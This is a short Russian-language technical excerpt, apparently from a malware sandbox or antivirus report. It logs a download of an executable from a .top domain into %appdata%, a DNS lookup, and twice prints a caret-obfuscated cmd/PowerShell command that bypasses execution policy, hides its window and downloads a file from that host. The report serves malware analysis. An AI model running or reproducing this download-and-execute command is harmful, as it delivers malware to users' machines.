Техническая информация
- http://docsnewsinfos.top/officemgmt.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOweRsHeL^l.exe^ -^EXE^c^UTI^O^N^POlicy ^b^Y^Pass ^-No^proF^I^Le^ -^WI^NDows^t^yLe HI^Dd^eN (N^Ew-^oB^J^Ec^T SySt^e^M^.^N^Et.WebC^lIent^)^.d^o^w^N^lo^AdFi^Le^(^'http://docsnews...
- DNS ASK do####wsinfos.top
- '<SYSTEM32>\cmd.exe' /c "pOweRsHeL^l.exe^ -^EXE^c^UTI^O^N^POlicy ^b^Y^Pass ^-No^proF^I^Le^ -^WI^NDows^t^yLe HI^Dd^eN (N^Ew-^oB^J^Ec^T SySt^e^M^.^N^Et.WebC^lIent^)^.d^o^w^N^lo^AdFi^Le^(^'http://docsnews...' (со скрытым окном)